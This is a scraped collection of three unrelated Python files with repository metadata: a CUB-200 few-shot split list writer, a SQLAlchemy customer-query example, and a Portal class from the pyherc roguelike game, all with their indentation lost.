file_list = []
label_list = []
for i, classfile_list in enumerate(classfile_list_all):
if 'base' in dataset:
if (i%2 == 0):
file_list = file_list + classfile_list
label_list = label_list + np.repeat(i, len(classfile_list)).tolist()
if 'val' in dataset:
if (i%4 == 1):
file_list = file_list + classfile_list
label_list = label_list + np.repeat(i, len(classfile_list)).tolist()
if 'novel' in dataset:
if (i%4 == 3):
file_list = file_list + classfile_list
label_list = label_list + np.repeat(i, len(classfile_list)).tolist()
fo = open(savedir + dataset + ".json", "w")
fo.write('{"label_names": [')
fo.writelines(['"%s",' % item for item in folder_list])
fo.seek(0, os.SEEK_END)
fo.seek(fo.tell()-1, os.SEEK_SET)
fo.write('],')
fo.write('"image_names": [')
fo.writelines(['"%s",' % item for item in file_list])
fo.seek(0, os.SEEK_END)
fo.seek(fo.tell()-1, os.SEEK_SET)
fo.write('],')
fo.write('"image_labels": [')
fo.writelines(['%d,' % item for item in label_list])
fo.seek(0, os.SEEK_END)
fo.seek(fo.tell()-1, os.SEEK_SET)
fo.write(']}')
fo.close()
print("%s -OK" %dataset)
|
alinlab/PsCo
|
splits/cub200/write_cub_filelist.py
|
write_cub_filelist.py
|
py
| 2,032 |
python
|
en
|
code
| 42 |
github-code
|
6
|
23135790413
|
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 9 21:16:51 2019
@author: eikivi
"""
from sqlalchemy import Column, Integer, String
from sqlalchemy import create_engine
from sqlalchemy import or_
engine = create_engine('sqlite:///sales.db', echo = False)
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class Customers(Base):
__tablename__ = 'customers'
id = Column(Integer, primary_key = True)
name = Column(String)
address = Column(String)
email = Column(String)
from sqlalchemy.orm import sessionmaker
Session = sessionmaker(bind = engine)
session = Session()
try:
# result = session.query(Customers).filter(or_(Customers.id>2, Customers.name.like('Ei%')))
#result = session.query(Customers).filter(Customers.id<2, Customers.name.like('Ja%'))
result = session.query(Customers).filter(Customers.id != 2)
#result = session.query(Customers).one()
except:
session.rollback()
raise
finally:
session.close()
print("")
#print(result)
for row in result:
print("")
print ("ID:", row.id, "Name: ",row.name, "Address:",row.address, "Email:",row.email)
|
baadam3/ICS0019_Advanced_python_solutions
|
Examples/Database_code/SQLAlchemyFilter7.py
|
SQLAlchemyFilter7.py
|
py
| 1,137 |
python
|
en
|
code
| 0 |
github-code
|
6
|
42933813764
|
import pyherc
from pyherc.aspects import log_debug
class Portal():
"""
Portal linking two levels together
"""
@log_debug
def __init__(self, icons, level_generator_name):
"""
Default constructor
:param icons: (my_icon, icon for other end)
:type icons: (integer, integer)
:param level_generator_name: name of level generator for proxy portals
:type level_generator_name: String
"""
super().__init__()
self.level = None
self.location = ()
self.__icons = icons
self.__other_end = None
self.exits_dungeon = False
self.level_generator_name = level_generator_name
self.model = None
self.__update_listeners = []
@log_debug
def get_other_end(self):
"""
Returns the other end of the portal
:param level_generator_factory: factory to generate level generators
:type level_generator_factory: LevelGeneratorFactory
:returns: other end of the portal
:rtype: Portal
"""
if self.__other_end is None:
pyherc.vtable['\ufdd0:generate-level'](self.level_generator_name, self)
return self.__other_end
@log_debug
def set_other_end(self, portal):
"""
Set the other end of the portal
:param portal: portal where this one leads
:type portal: Portal
"""
self.__other_end = portal
@log_debug
def __get_icon(self):
"""
Get icon to display this portal
:returns: icon of the portal
:rtype: integer
"""
return self.__icons[0]
@log_debug
def __set_icon(self, icon):
"""
Set icon to display this portal
:param icon: icon to use for the portal
:type icon: integer
"""
if self.__icons is None:
self.__icons = (None, None)
self.__icons = (icon, self.__icons[1])
@log_debug
def __get_other_end_icon(self):
"""
Get icon used for other end of this portal
:returns: icon of the other end
:rtype: integer
"""
return self.__icons[1]
@log_debug
def register_for_updates(self, listener):
"""
Register listener to receive updates for this entity
:param listener: listener to add
:type listener: Listener
.. versionadded:: 0.5
"""
self.__update_listeners.append(listener)
@log_debug
def remove_from_updates(self, listener):
"""
Remove listener
:param listener: listener to remove
:type listener: Listener
.. versionadded:: 0.5
"""
self.__update_listeners.remove(listener)
@log_debug
def notify_update_listeners(self, event):
"""
Notify all listeners registered for update of this entity
:param event: event to relay to update listeners
:type event: Event
.. versionadded:: 0.5
"""
for listener in self.__update_listeners:
listener.receive_update(event)
icon = property(__get_icon, __set_icon)
other_end_icon = property(__get_other_end_icon)
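# A minimal listener sketch: notify_update_listeners() only calls
# listener.receive_update(event), so any object with that method can be passed
# to register_for_updates(). Hypothetical example, not part of pyherc:
#     class PrintListener:
#         def receive_update(self, event):
#             print(event)
#     portal.register_for_updates(PrintListener())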
|
tuturto/pyherc
|
src/pyherc/data/portal.py
|
portal.py
|
py
| 3,215 |
python
|
en
|
code
| 43 |
github-code
|
6
|